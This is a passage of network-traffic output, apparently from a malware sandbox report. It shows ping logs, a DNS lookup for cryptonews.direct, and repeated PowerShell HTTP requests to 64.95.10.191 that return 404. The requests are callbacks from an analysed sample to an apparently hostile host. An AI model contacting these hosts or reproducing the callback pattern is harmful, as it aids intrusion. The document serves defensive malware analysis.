      Apr 23, 2024 17:49:09.741988897 CEST192.168.2.91.1.1.14c8cEcho
      Apr 23, 2024 17:49:09.848068953 CEST1.1.1.1192.168.2.9548cEcho Reply
      Apr 23, 2024 17:49:10.785437107 CEST192.168.2.91.1.1.14c8bEcho
      Apr 23, 2024 17:49:10.891729116 CEST1.1.1.1192.168.2.9548bEcho Reply
      Apr 23, 2024 17:49:11.217905998 CEST192.168.2.91.1.1.14c8aEcho
      Apr 23, 2024 17:49:11.323883057 CEST1.1.1.1192.168.2.9548aEcho Reply
      Apr 23, 2024 17:49:12.222959042 CEST192.168.2.91.1.1.14c89Echo
      Apr 23, 2024 17:49:12.328815937 CEST1.1.1.1192.168.2.95489Echo Reply
      Apr 23, 2024 17:49:13.238643885 CEST192.168.2.91.1.1.14c88Echo
      Apr 23, 2024 17:49:13.344718933 CEST1.1.1.1192.168.2.95488Echo Reply
      Apr 23, 2024 17:49:14.254406929 CEST192.168.2.91.1.1.14c87Echo
      Apr 23, 2024 17:49:14.360392094 CEST1.1.1.1192.168.2.95487Echo Reply
      Apr 23, 2024 17:49:14.388942003 CEST192.168.2.91.1.1.14c86Echo
      Apr 23, 2024 17:49:14.494918108 CEST1.1.1.1192.168.2.95486Echo Reply
      Apr 23, 2024 17:49:15.396599054 CEST192.168.2.91.1.1.14c85Echo
      Apr 23, 2024 17:49:15.502756119 CEST1.1.1.1192.168.2.95485Echo Reply
      Apr 23, 2024 17:49:16.410564899 CEST192.168.2.91.1.1.14c84Echo
      Apr 23, 2024 17:49:16.516659021 CEST1.1.1.1192.168.2.95484Echo Reply
      Apr 23, 2024 17:49:17.427169085 CEST192.168.2.91.1.1.14c83Echo
      Apr 23, 2024 17:49:17.533283949 CEST1.1.1.1192.168.2.95483Echo Reply
      Apr 23, 2024 17:49:17.850615025 CEST192.168.2.91.1.1.14c82Echo
      Apr 23, 2024 17:49:17.956533909 CEST1.1.1.1192.168.2.95482Echo Reply
      Apr 23, 2024 17:49:18.863755941 CEST192.168.2.91.1.1.14c81Echo
      Apr 23, 2024 17:49:18.970089912 CEST1.1.1.1192.168.2.95481Echo Reply
      Apr 23, 2024 17:49:19.880597115 CEST192.168.2.91.1.1.14c80Echo
      Apr 23, 2024 17:49:19.986684084 CEST1.1.1.1192.168.2.95480Echo Reply
      Apr 23, 2024 17:49:20.895025015 CEST192.168.2.91.1.1.14c7fEcho
      Apr 23, 2024 17:49:21.001421928 CEST1.1.1.1192.168.2.9547fEcho Reply
      Apr 23, 2024 17:49:21.042119980 CEST192.168.2.91.1.1.14c7eEcho
      Apr 23, 2024 17:49:21.147984028 CEST1.1.1.1192.168.2.9547eEcho Reply
      Apr 23, 2024 17:49:22.051198959 CEST192.168.2.91.1.1.14c7dEcho
      Apr 23, 2024 17:49:22.157365084 CEST1.1.1.1192.168.2.9547dEcho Reply
      Apr 23, 2024 17:49:23.066728115 CEST192.168.2.91.1.1.14c7cEcho
      Apr 23, 2024 17:49:23.172770977 CEST1.1.1.1192.168.2.9547cEcho Reply
      Apr 23, 2024 17:49:24.087836027 CEST192.168.2.91.1.1.14c7bEcho
      Apr 23, 2024 17:49:24.193972111 CEST1.1.1.1192.168.2.9547bEcho Reply
      Apr 23, 2024 17:49:24.528692007 CEST192.168.2.91.1.1.14c7aEcho
      Apr 23, 2024 17:49:24.634609938 CEST1.1.1.1192.168.2.9547aEcho Reply
      Apr 23, 2024 17:49:25.711424112 CEST192.168.2.91.1.1.14c79Echo
      Apr 23, 2024 17:49:25.818238020 CEST1.1.1.1192.168.2.95479Echo Reply
      Apr 23, 2024 17:49:27.207710028 CEST192.168.2.91.1.1.14c78Echo
      Apr 23, 2024 17:49:27.314172029 CEST1.1.1.1192.168.2.95478Echo Reply
      Apr 23, 2024 17:49:28.285454988 CEST192.168.2.91.1.1.14c77Echo
      Apr 23, 2024 17:49:28.391434908 CEST1.1.1.1192.168.2.95477Echo Reply
      Apr 23, 2024 17:49:28.455487013 CEST192.168.2.91.1.1.14c76Echo
      Apr 23, 2024 17:49:28.561400890 CEST1.1.1.1192.168.2.95476Echo Reply
      Apr 23, 2024 17:49:29.472970009 CEST192.168.2.91.1.1.14c75Echo
      Apr 23, 2024 17:49:29.579148054 CEST1.1.1.1192.168.2.95475Echo Reply
      Apr 23, 2024 17:49:30.489196062 CEST192.168.2.91.1.1.14c74Echo
      Apr 23, 2024 17:49:30.595321894 CEST1.1.1.1192.168.2.95474Echo Reply
      Apr 23, 2024 17:49:31.520006895 CEST192.168.2.91.1.1.14c73Echo
      Apr 23, 2024 17:49:31.626465082 CEST1.1.1.1192.168.2.95473Echo Reply
      Apr 23, 2024 17:49:31.664880991 CEST192.168.2.91.1.1.14c72Echo
      Apr 23, 2024 17:49:31.770773888 CEST1.1.1.1192.168.2.95472Echo Reply
      Apr 23, 2024 17:49:32.677383900 CEST192.168.2.91.1.1.14c71Echo
      Apr 23, 2024 17:49:32.783536911 CEST1.1.1.1192.168.2.95471Echo Reply
      Apr 23, 2024 17:49:33.691850901 CEST192.168.2.91.1.1.14c70Echo
      Apr 23, 2024 17:49:33.797821045 CEST1.1.1.1192.168.2.95470Echo Reply
      Apr 23, 2024 17:49:34.708612919 CEST192.168.2.91.1.1.14c6fEcho
      Apr 23, 2024 17:49:34.814687967 CEST1.1.1.1192.168.2.9546fEcho Reply
      Apr 23, 2024 17:49:34.872610092 CEST192.168.2.91.1.1.14c6eEcho
      Apr 23, 2024 17:49:34.978581905 CEST1.1.1.1192.168.2.9546eEcho Reply
      Apr 23, 2024 17:49:35.879251957 CEST192.168.2.91.1.1.14c6dEcho
      Apr 23, 2024 17:49:35.985162973 CEST1.1.1.1192.168.2.9546dEcho Reply
      Apr 23, 2024 17:49:36.896609068 CEST192.168.2.91.1.1.14c6cEcho
      Apr 23, 2024 17:49:37.002722979 CEST1.1.1.1192.168.2.9546cEcho Reply
      Apr 23, 2024 17:49:37.910422087 CEST192.168.2.91.1.1.14c6bEcho
      Apr 23, 2024 17:49:38.016324997 CEST1.1.1.1192.168.2.9546bEcho Reply
      Apr 23, 2024 17:49:38.348604918 CEST192.168.2.91.1.1.14c6aEcho
      Apr 23, 2024 17:49:38.454735994 CEST1.1.1.1192.168.2.9546aEcho Reply
      Apr 23, 2024 17:49:39.363893986 CEST192.168.2.91.1.1.14c69Echo
      Apr 23, 2024 17:49:39.470032930 CEST1.1.1.1192.168.2.95469Echo Reply
      Apr 23, 2024 17:49:40.380620956 CEST192.168.2.91.1.1.14c68Echo
      Apr 23, 2024 17:49:40.486679077 CEST1.1.1.1192.168.2.95468Echo Reply
      Apr 23, 2024 17:49:41.394908905 CEST192.168.2.91.1.1.14c67Echo
      Apr 23, 2024 17:49:41.500771999 CEST1.1.1.1192.168.2.95467Echo Reply
      Apr 23, 2024 17:49:41.529803038 CEST192.168.2.91.1.1.14c66Echo
      Apr 23, 2024 17:49:41.636240959 CEST1.1.1.1192.168.2.95466Echo Reply
      Apr 23, 2024 17:49:42.535414934 CEST192.168.2.91.1.1.14c65Echo
      Apr 23, 2024 17:49:42.641309977 CEST1.1.1.1192.168.2.95465Echo Reply
      Apr 23, 2024 17:49:43.660116911 CEST192.168.2.91.1.1.14c64Echo
      Apr 23, 2024 17:49:43.766237974 CEST1.1.1.1192.168.2.95464Echo Reply
      Apr 23, 2024 17:49:44.941698074 CEST192.168.2.91.1.1.14c63Echo
      Apr 23, 2024 17:49:45.047694921 CEST1.1.1.1192.168.2.95463Echo Reply
      Apr 23, 2024 17:49:45.345982075 CEST192.168.2.91.1.1.14c62Echo
      Apr 23, 2024 17:49:45.452872038 CEST1.1.1.1192.168.2.95462Echo Reply
      Apr 23, 2024 17:49:46.364609003 CEST192.168.2.91.1.1.14c61Echo
      Apr 23, 2024 17:49:46.470640898 CEST1.1.1.1192.168.2.95461Echo Reply
      Apr 23, 2024 17:49:47.379193068 CEST192.168.2.91.1.1.14c60Echo
      Apr 23, 2024 17:49:47.485318899 CEST1.1.1.1192.168.2.95460Echo Reply
      Apr 23, 2024 17:49:48.394834995 CEST192.168.2.91.1.1.14c5fEcho
      Apr 23, 2024 17:49:48.500895977 CEST1.1.1.1192.168.2.9545fEcho Reply
      Apr 23, 2024 17:49:48.532614946 CEST192.168.2.91.1.1.14c5eEcho
      Apr 23, 2024 17:49:48.638597012 CEST1.1.1.1192.168.2.9545eEcho Reply
      Apr 23, 2024 17:49:49.536734104 CEST192.168.2.91.1.1.14c5dEcho
      Apr 23, 2024 17:49:49.642733097 CEST1.1.1.1192.168.2.9545dEcho Reply
      Apr 23, 2024 17:49:50.552717924 CEST192.168.2.91.1.1.14c5cEcho
      Apr 23, 2024 17:49:50.658915997 CEST1.1.1.1192.168.2.9545cEcho Reply
      Apr 23, 2024 17:49:51.566797018 CEST192.168.2.91.1.1.14c5bEcho
      Apr 23, 2024 17:49:51.672919989 CEST1.1.1.1192.168.2.9545bEcho Reply
      Apr 23, 2024 17:49:52.000655890 CEST192.168.2.91.1.1.14c5aEcho
      Apr 23, 2024 17:49:52.106590986 CEST1.1.1.1192.168.2.9545aEcho Reply
      Apr 23, 2024 17:49:53.006671906 CEST192.168.2.91.1.1.14c59Echo
      Apr 23, 2024 17:49:53.112643957 CEST1.1.1.1192.168.2.95459Echo Reply
      Apr 23, 2024 17:49:54.019830942 CEST192.168.2.91.1.1.14c58Echo
      Apr 23, 2024 17:49:54.125792980 CEST1.1.1.1192.168.2.95458Echo Reply
      Apr 23, 2024 17:49:55.036611080 CEST192.168.2.91.1.1.14c57Echo
      Apr 23, 2024 17:49:55.142745972 CEST1.1.1.1192.168.2.95457Echo Reply
      Apr 23, 2024 17:49:55.567886114 CEST192.168.2.91.1.1.14c56Echo
      Apr 23, 2024 17:49:55.673727036 CEST1.1.1.1192.168.2.95456Echo Reply
      Apr 23, 2024 17:49:56.582374096 CEST192.168.2.91.1.1.14c55Echo
      Apr 23, 2024 17:49:56.688344955 CEST1.1.1.1192.168.2.95455Echo Reply
      Apr 23, 2024 17:49:57.597949028 CEST192.168.2.91.1.1.14c54Echo
      Apr 23, 2024 17:49:57.703881025 CEST1.1.1.1192.168.2.95454Echo Reply
      Apr 23, 2024 17:49:58.613593102 CEST192.168.2.91.1.1.14c53Echo
      Apr 23, 2024 17:49:58.719757080 CEST1.1.1.1192.168.2.95453Echo Reply
      Apr 23, 2024 17:49:59.019943953 CEST192.168.2.91.1.1.14c52Echo
      Apr 23, 2024 17:49:59.125730991 CEST1.1.1.1192.168.2.95452Echo Reply
      Apr 23, 2024 17:50:00.035471916 CEST192.168.2.91.1.1.14c51Echo
      Apr 23, 2024 17:50:00.141520023 CEST1.1.1.1192.168.2.95451Echo Reply
      Apr 23, 2024 17:50:01.051052094 CEST192.168.2.91.1.1.14c50Echo
      Apr 23, 2024 17:50:01.157022953 CEST1.1.1.1192.168.2.95450Echo Reply

      DNS Queries

      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
      Apr 23, 2024 17:45:55.284347057 CEST192.168.2.91.1.1.10x7e35Standard query (0)cryptonews.directA (IP address)IN (0x0001)false

      DNS Answers

      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
      Apr 23, 2024 17:45:55.424246073 CEST1.1.1.1192.168.2.90x7e35No error (0)cryptonews.direct172.67.168.231A (IP address)IN (0x0001)false
      Apr 23, 2024 17:45:55.424246073 CEST1.1.1.1192.168.2.90x7e35No error (0)cryptonews.direct104.21.27.45A (IP address)IN (0x0001)false

      HTTP Request Dependency Graph

      • cryptonews.direct
      • 64.95.10.191

      HTTP Packets

      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      0192.168.2.94971264.95.10.191803632C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      TimestampBytes transferredDirectionData
      Apr 23, 2024 17:46:21.011342049 CEST72OUTGET /2220045058 HTTP/1.1
      Host: 64.95.10.191
      Connection: Keep-Alive
      Apr 23, 2024 17:46:21.196289062 CEST275INHTTP/1.1 404 Not Found
      X-Powered-By: Express
      Access-Control-Allow-Origin: *
      Content-Type: text/plain; charset=utf-8
      Content-Length: 9
      ETag: W/"9-0gXL1ngzMqISxa6S1zx3F4wtLyg"
      Date: Tue, 23 Apr 2024 15:46:21 GMT
      Connection: keep-alive
      Keep-Alive: timeout=5
      Data Raw: 4e 6f 74 20 46 6f 75 6e 64
      Data Ascii: Not Found


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      1192.168.2.94971364.95.10.191803632C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      TimestampBytes transferredDirectionData
      Apr 23, 2024 17:46:28.629365921 CEST48OUTGET /2220045058 HTTP/1.1
      Host: 64.95.10.191
      Apr 23, 2024 17:46:28.790913105 CEST275INHTTP/1.1 404 Not Found
      X-Powered-By: Express
      Access-Control-Allow-Origin: *
      Content-Type: text/plain; charset=utf-8
      Content-Length: 9
      ETag: W/"9-0gXL1ngzMqISxa6S1zx3F4wtLyg"
      Date: Tue, 23 Apr 2024 15:46:28 GMT
      Connection: keep-alive
      Keep-Alive: timeout=5
      Data Raw: 4e 6f 74 20 46 6f 75 6e 64
      Data Ascii: Not Found


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      2192.168.2.94971464.95.10.191803632C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      TimestampBytes transferredDirectionData
      Apr 23, 2024 17:46:35.321919918 CEST72OUTGET /2220045058 HTTP/1.1
      Host: 64.95.10.191
      Connection: Keep-Alive
      Apr 23, 2024 17:46:35.484164000 CEST275INHTTP/1.1 404 Not Found
      X-Powered-By: Express
      Access-Control-Allow-Origin: *
      Content-Type: text/plain; charset=utf-8
      Content-Length: 9
      ETag: W/"9-0gXL1ngzMqISxa6S1zx3F4wtLyg"
      Date: Tue, 23 Apr 2024 15:46:35 GMT
      Connection: keep-alive
      Keep-Alive: timeout=5
      Data Raw: 4e 6f 74 20 46 6f 75 6e 64
      Data Ascii: Not Found


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      3192.168.2.94971564.95.10.191803632C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      TimestampBytes transferredDirectionData
      Apr 23, 2024 17:46:42.055190086 CEST72OUTGET /2220045058 HTTP/1.1
      Host: 64.95.10.191
      Connection: Keep-Alive
      Apr 23, 2024 17:46:42.202147961 CEST275INHTTP/1.1 404 Not Found
      X-Powered-By: Express
      Access-Control-Allow-Origin: *
      Content-Type: text/plain; charset=utf-8
      Content-Length: 9
      ETag: W/"9-0gXL1ngzMqISxa6S1zx3F4wtLyg"
      Date: Tue, 23 Apr 2024 15:46:42 GMT
      Connection: keep-alive
      Keep-Alive: timeout=5
      Data Raw: 4e 6f 74 20 46 6f 75 6e 64
      Data Ascii: Not Found


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      4192.168.2.94971664.95.10.191803632C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      TimestampBytes transferredDirectionData
      Apr 23, 2024 17:46:48.808165073 CEST72OUTGET /2220045058 HTTP/1.1
      Host: 64.95.10.191
      Connection: Keep-Alive
      Apr 23, 2024 17:46:48.950421095 CEST275INHTTP/1.1 404 Not Found
      X-Powered-By: Express
      Access-Control-Allow-Origin: *
      Content-Type: text/plain; charset=utf-8
      Content-Length: 9
      ETag: W/"9-0gXL1ngzMqISxa6S1zx3F4wtLyg"
      Date: Tue, 23 Apr 2024 15:46:48 GMT
      Connection: keep-alive
      Keep-Alive: timeout=5
      Data Raw: 4e 6f 74 20 46 6f 75 6e 64
      Data Ascii: Not Found


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      5192.168.2.94971864.95.10.191803632C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      TimestampBytes transferredDirectionData
      Apr 23, 2024 17:46:55.520025015 CEST72OUTGET /2220045058 HTTP/1.1
      Host: 64.95.10.191
      Connection: Keep-Alive
      Apr 23, 2024 17:46:55.665108919 CEST275INHTTP/1.1 404 Not Found
      X-Powered-By: Express
      Access-Control-Allow-Origin: *
      Content-Type: text/plain; charset=utf-8
      Content-Length: 9
      ETag: W/"9-0gXL1ngzMqISxa6S1zx3F4wtLyg"
      Date: Tue, 23 Apr 2024 15:46:55 GMT
      Connection: keep-alive
      Keep-Alive: timeout=5
      Data Raw: 4e 6f 74 20 46 6f 75 6e 64
      Data Ascii: Not Found


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      6192.168.2.94971964.95.10.191803632C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      TimestampBytes transferredDirectionData
      Apr 23, 2024 17:47:02.261693954 CEST72OUTGET /2220045058 HTTP/1.1
      Host: 64.95.10.191
      Connection: Keep-Alive
      Apr 23, 2024 17:47:02.413923979 CEST275INHTTP/1.1 404 Not Found
      X-Powered-By: Express
      Access-Control-Allow-Origin: *
      Content-Type: text/plain; charset=utf-8
      Content-Length: 9
      ETag: W/"9-0gXL1ngzMqISxa6S1zx3F4wtLyg"
      Date: Tue, 23 Apr 2024 15:47:02 GMT
      Connection: keep-alive
      Keep-Alive: timeout=5
      Data Raw: 4e 6f 74 20 46 6f 75 6e 64
      Data Ascii: Not Found


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      7192.168.2.94972064.95.10.191803632C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      TimestampBytes transferredDirectionData
      Apr 23, 2024 17:47:08.961628914 CEST72OUTGET /2220045058 HTTP/1.1
      Host: 64.95.10.191
      Connection: Keep-Alive
      Apr 23, 2024 17:47:09.132788897 CEST275INHTTP/1.1 404 Not Found
      X-Powered-By: Express
      Access-Control-Allow-Origin: *
      Content-Type: text/plain; charset=utf-8
      Content-Length: 9
      ETag: W/"9-0gXL1ngzMqISxa6S1zx3F4wtLyg"
      Date: Tue, 23 Apr 2024 15:47:09 GMT
      Connection: keep-alive
      Keep-Alive: timeout=5
      Data Raw: 4e 6f 74 20 46 6f 75 6e 64
      Data Ascii: Not Found


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      8192.168.2.94972164.95.10.191803632C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      TimestampBytes transferredDirectionData
      Apr 23, 2024 17:47:15.894783020 CEST72OUTGET /2220045058 HTTP/1.1
      Host: 64.95.10.191
      Connection: Keep-Alive
      Apr 23, 2024 17:47:16.059760094 CEST275INHTTP/1.1 404 Not Found
      X-Powered-By: Express
      Access-Control-Allow-Origin: *
      Content-Type: text/plain; charset=utf-8
      Content-Length: 9
      ETag: W/"9-0gXL1ngzMqISxa6S1zx3F4wtLyg"
      Date: Tue, 23 Apr 2024 15:47:15 GMT
      Connection: keep-alive
      Keep-Alive: timeout=5
      Data Raw: 4e 6f 74 20 46 6f 75 6e 64
      Data Ascii: Not Found


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      9192.168.2.94972264.95.10.191803632C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      TimestampBytes transferredDirectionData
      Apr 23, 2024 17:47:22.752999067 CEST72OUTGET /2220045058 HTTP/1.1
      Host: 64.95.10.191
      Connection: Keep-Alive
      Apr 23, 2024 17:47:22.896133900 CEST275INHTTP/1.1 404 Not Found
      X-Powered-By: Express
      Access-Control-Allow-Origin: *
      Content-Type: text/plain; charset=utf-8
      Content-Length: 9
      ETag: W/"9-0gXL1ngzMqISxa6S1zx3F4wtLyg"
      Date: Tue, 23 Apr 2024 15:47:22 GMT
      Connection: keep-alive
      Keep-Alive: timeout=5
      Data Raw: 4e 6f 74 20 46 6f 75 6e 64
      Data Ascii: Not Found


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      10192.168.2.94972364.95.10.191803632C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      TimestampBytes transferredDirectionData
      Apr 23, 2024 17:47:29.469980001 CEST72OUTGET /2220045058 HTTP/1.1
      Host: 64.95.10.191
      Connection: Keep-Alive
      Apr 23, 2024 17:47:29.644107103 CEST275INHTTP/1.1 404 Not Found
      X-Powered-By: Express
      Access-Control-Allow-Origin: *
      Content-Type: text/plain; charset=utf-8
      Content-Length: 9
      ETag: W/"9-0gXL1ngzMqISxa6S1zx3F4wtLyg"
      Date: Tue, 23 Apr 2024 15:47:29 GMT
      Connection: keep-alive
      Keep-Alive: timeout=5
      Data Raw: 4e 6f 74 20 46 6f 75 6e 64
      Data Ascii: Not Found


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      11192.168.2.94972464.95.10.191803632C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      TimestampBytes transferredDirectionData
      Apr 23, 2024 17:47:36.444705009 CEST72OUTGET /2220045058 HTTP/1.1
      Host: 64.95.10.191
      Connection: Keep-Alive
      Apr 23, 2024 17:47:36.585005045 CEST275INHTTP/1.1 404 Not Found
      X-Powered-By: Express
      Access-Control-Allow-Origin: *
      Content-Type: text/plain; charset=utf-8
      Content-Length: 9
      ETag: W/"9-0gXL1ngzMqISxa6S1zx3F4wtLyg"
      Date: Tue, 23 Apr 2024 15:47:36 GMT
      Connection: keep-alive
      Keep-Alive: timeout=5
      Data Raw: 4e 6f 74 20 46 6f 75 6e 64
      Data Ascii: Not Found


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      12192.168.2.94972564.95.10.191803632C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      TimestampBytes transferredDirectionData
      Apr 23, 2024 17:47:43.059370995 CEST72OUTGET /2220045058 HTTP/1.1
      Host: 64.95.10.191
      Connection: Keep-Alive
      Apr 23, 2024 17:47:43.210978031 CEST275INHTTP/1.1 404 Not Found
      X-Powered-By: Express
      Access-Control-Allow-Origin: *
      Content-Type: text/plain; charset=utf-8
      Content-Length: 9
      ETag: W/"9-0gXL1ngzMqISxa6S1zx3F4wtLyg"
      Date: Tue, 23 Apr 2024 15:47:43 GMT
      Connection: keep-alive
      Keep-Alive: timeout=5
      Data Raw: 4e 6f 74 20 46 6f 75 6e 64
      Data Ascii: Not Found


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      13192.168.2.94972664.95.10.191803632C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      TimestampBytes transferredDirectionData
      Apr 23, 2024 17:47:49.700859070 CEST72OUTGET /2220045058 HTTP/1.1
      Host: 64.95.10.191
      Connection: Keep-Alive
      Apr 23, 2024 17:47:49.875200987 CEST275INHTTP/1.1 404 Not Found
      X-Powered-By: Express
      Access-Control-Allow-Origin: *
      Content-Type: text/plain; charset=utf-8
      Content-Length: 9
      ETag: W/"9-0gXL1ngzMqISxa6S1zx3F4wtLyg"
      Date: Tue, 23 Apr 2024 15:47:49 GMT
      Connection: keep-alive
      Keep-Alive: timeout=5
      Data Raw: 4e 6f 74 20 46 6f 75 6e 64
      Data Ascii: Not Found


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      14192.168.2.94972764.95.10.191803632C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      TimestampBytes transferredDirectionData
      Apr 23, 2024 17:47:56.406135082 CEST72OUTGET /2220045058 HTTP/1.1
      Host: 64.95.10.191
      Connection: Keep-Alive
      Apr 23, 2024 17:47:56.581450939 CEST275INHTTP/1.1 404 Not Found
      X-Powered-By: Express
      Access-Control-Allow-Origin: *
      Content-Type: text/plain; charset=utf-8
      Content-Length: 9
      ETag: W/"9-0gXL1ngzMqISxa6S1zx3F4wtLyg"
      Date: Tue, 23 Apr 2024 15:47:56 GMT
      Connection: keep-alive
      Keep-Alive: timeout=5
      Data Raw: 4e 6f 74 20 46 6f 75 6e 64
      Data Ascii: Not Found


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      15192.168.2.94972864.95.10.191803632C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      TimestampBytes transferredDirectionData
      Apr 23, 2024 17:48:03.073859930 CEST72OUTGET /2220045058 HTTP/1.1
      Host: 64.95.10.191
      Connection: Keep-Alive
      Apr 23, 2024 17:48:03.232517004 CEST275INHTTP/1.1 404 Not Found
      X-Powered-By: Express
      Access-Control-Allow-Origin: *
      Content-Type: text/plain; charset=utf-8
      Content-Length: 9
      ETag: W/"9-0gXL1ngzMqISxa6S1zx3F4wtLyg"
      Date: Tue, 23 Apr 2024 15:48:03 GMT
      Connection: keep-alive
      Keep-Alive: timeout=5
      Data Raw: 4e 6f 74 20 46 6f 75 6e 64
      Data Ascii: Not Found


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      16192.168.2.94972964.95.10.191803632C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      TimestampBytes transferredDirectionData
      Apr 23, 2024 17:48:10.327810049 CEST72OUTGET /2220045058 HTTP/1.1
      Host: 64.95.10.191
      Connection: Keep-Alive
      Apr 23, 2024 17:48:10.475567102 CEST275INHTTP/1.1 404 Not Found
      X-Powered-By: Express
      Access-Control-Allow-Origin: *
      Content-Type: text/plain; charset=utf-8
      Content-Length: 9
      ETag: W/"9-0gXL1ngzMqISxa6S1zx3F4wtLyg"
      Date: Tue, 23 Apr 2024 15:48:10 GMT
      Connection: keep-alive
      Keep-Alive: timeout=5
      Data Raw: 4e 6f 74 20 46 6f 75 6e 64
      Data Ascii: Not Found


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      17192.168.2.94973064.95.10.191803632C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      TimestampBytes transferredDirectionData
      Apr 23, 2024 17:48:16.963794947 CEST72OUTGET /2220045058 HTTP/1.1
      Host: 64.95.10.191
      Connection: Keep-Alive
      Apr 23, 2024 17:48:17.118267059 CEST275INHTTP/1.1 404 Not Found
      X-Powered-By: Express
      Access-Control-Allow-Origin: *
      Content-Type: text/plain; charset=utf-8
      Content-Length: 9
      ETag: W/"9-0gXL1ngzMqISxa6S1zx3F4wtLyg"
      Date: Tue, 23 Apr 2024 15:48:17 GMT
      Connection: keep-alive
      Keep-Alive: timeout=5
      Data Raw: 4e 6f 74 20 46 6f 75 6e 64
      Data Ascii: Not Found


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      18192.168.2.94973164.95.10.191803632C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      TimestampBytes transferredDirectionData
      Apr 23, 2024 17:48:23.901830912 CEST72OUTGET /2220045058 HTTP/1.1
      Host: 64.95.10.191
      Connection: Keep-Alive
      Apr 23, 2024 17:48:24.075773001 CEST275INHTTP/1.1 404 Not Found
      X-Powered-By: Express
      Access-Control-Allow-Origin: *
      Content-Type: text/plain; charset=utf-8
      Content-Length: 9
      ETag: W/"9-0gXL1ngzMqISxa6S1zx3F4wtLyg"
      Date: Tue, 23 Apr 2024 15:48:24 GMT
      Connection: keep-alive
      Keep-Alive: timeout=5
      Data Raw: 4e 6f 74 20 46 6f 75 6e 64
      Data Ascii: Not Found


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      19192.168.2.94973264.95.10.191803632C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      TimestampBytes transferredDirectionData
      Apr 23, 2024 17:48:30.556915998 CEST72OUTGET /2220045058 HTTP/1.1
      Host: 64.95.10.191
      Connection: Keep-Alive
      Apr 23, 2024 17:48:30.706118107 CEST275INHTTP/1.1 404 Not Found
      X-Powered-By: Express
      Access-Control-Allow-Origin: *
      Content-Type: text/plain; charset=utf-8
      Content-Length: 9
      ETag: W/"9-0gXL1ngzMqISxa6S1zx3F4wtLyg"
      Date: Tue, 23 Apr 2024 15:48:30 GMT
      Connection: keep-alive
      Keep-Alive: timeout=5
      Data Raw: 4e 6f 74 20 46 6f 75 6e 64
      Data Ascii: Not Found


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      20192.168.2.94973364.95.10.191803632C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      TimestampBytes transferredDirectionData
      Apr 23, 2024 17:48:37.217258930 CEST72OUTGET /2220045058 HTTP/1.1
      Host: 64.95.10.191
      Connection: Keep-Alive
      Apr 23, 2024 17:48:37.387003899 CEST275INHTTP/1.1 404 Not Found
      X-Powered-By: Express
      Access-Control-Allow-Origin: *
      Content-Type: text/plain; charset=utf-8
      Content-Length: 9
      ETag: W/"9-0gXL1ngzMqISxa6S1zx3F4wtLyg"
      Date: Tue, 23 Apr 2024 15:48:37 GMT
      Connection: keep-alive
      Keep-Alive: timeout=5
      Data Raw: 4e 6f 74 20 46 6f 75 6e 64
      Data Ascii: Not Found


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      21192.168.2.94973464.95.10.191803632C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      TimestampBytes transferredDirectionData
      Apr 23, 2024 17:48:43.884644032 CEST72OUTGET /2220045058 HTTP/1.1
      Host: 64.95.10.191
      Connection: Keep-Alive
      Apr 23, 2024 17:48:44.037225962 CEST275INHTTP/1.1 404 Not Found
      X-Powered-By: Express
      Access-Control-Allow-Origin: *
      Content-Type: text/plain; charset=utf-8
      Content-Length: 9
      ETag: W/"9-0gXL1ngzMqISxa6S1zx3F4wtLyg"
      Date: Tue, 23 Apr 2024 15:48:43 GMT
      Connection: keep-alive
      Keep-Alive: timeout=5
      Data Raw: 4e 6f 74 20 46 6f 75 6e 64
      Data Ascii: Not Found


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      22192.168.2.94973564.95.10.191803632C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      TimestampBytes transferredDirectionData
      Apr 23, 2024 17:48:50.510087013 CEST72OUTGET /2220045058 HTTP/1.1
      Host: 64.95.10.191
      Connection: Keep-Alive
      Apr 23, 2024 17:48:50.651252031 CEST275INHTTP/1.1 404 Not Found
      X-Powered-By: Express
      Access-Control-Allow-Origin: *
